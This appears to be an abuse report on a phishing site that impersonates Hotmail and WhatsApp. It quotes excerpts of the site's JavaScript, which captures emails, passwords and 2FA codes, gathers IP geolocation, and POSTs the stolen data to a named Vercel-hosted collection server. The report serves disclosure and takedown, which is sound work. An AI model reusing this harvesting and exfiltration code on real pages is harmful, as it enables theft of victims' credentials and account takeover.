Here is the updated report with the frontend information:
Problem Description
A phishing website has been identified that steals users' personal data. The site is hosted on Azure Static Web Apps and impersonates Hotmail and WhatsApp services.
Infrastructure
- Frontend URL: Validación PIN
- Backend/C2 Server: https://servidorne.vercel.app/discord (Vercel)
Attack Flow
The frontend captures user credentials, phone numbers, and 2FA codes, then communicates directly with the backend server to exfiltrate all stolen data, including IP address, geolocation, and timestamps.
Malicious site URL:
https://servidorne.vercel.app/discord
Steps Executed by the Attack
Step 1: Credential Capture
```javascript
// Excerpt from the site's file.js: stores the entered e-mail locally and
// forwards the credential pair to the operator via a Discord-style message.
async function sendLoginData(email, password) {
  setStorageData(CONFIG.STORAGE_KEYS.CORREO, email);
  const message = await formatEnhancedMessage("Login", password, {
    Email: email,
  });
  return await sendToDiscord(message, { username: "Login System" });
}
```
Step 2: Extracts Geolocation
```javascript
// Excerpt from file.js (body summarised in the original report, not reproduced).
async function getEnhancedIPInfo() {
  // Tries 5 different APIs to obtain IP
  // APIs: ipapi.co, ipinfo.io, myip.com, ipwho.is, bigdatacloud
  // Obtains: IP, country, city, region, timestamp
}
```
Step 3: Captures 2FA Codes
```javascript
// Excerpt from file.js: relays the SMS / 2FA code the victim types in.
async function sendSmsCode(code) {
  const message = await formatEnhancedMessage("SMS", code);
  return await sendToDiscord(message, { username: "SMS System" });
}
```
Step 4: Sends to C2 Server
```javascript
// Excerpt from file.js (inside an async function): the final POST that
// delivers the collected data to the Vercel-hosted backend.
const response = await fetch("https://servidorne.vercel.app/discord", {
  method: "POST",
  body: formData,
});
```
Project Information
| Aspect | Detail |
|---|---|
| Hosting Platform | Vercel |
| Malicious URL | https://servidorne.vercel.app/discord |
| Attack Type | Phishing + Data Exfiltration |
| Target | Credential and location theft |
| Data Stolen | Email, password, phone, IP, 2FA codes |
| Source Code | file.js - 430 lines of JavaScript |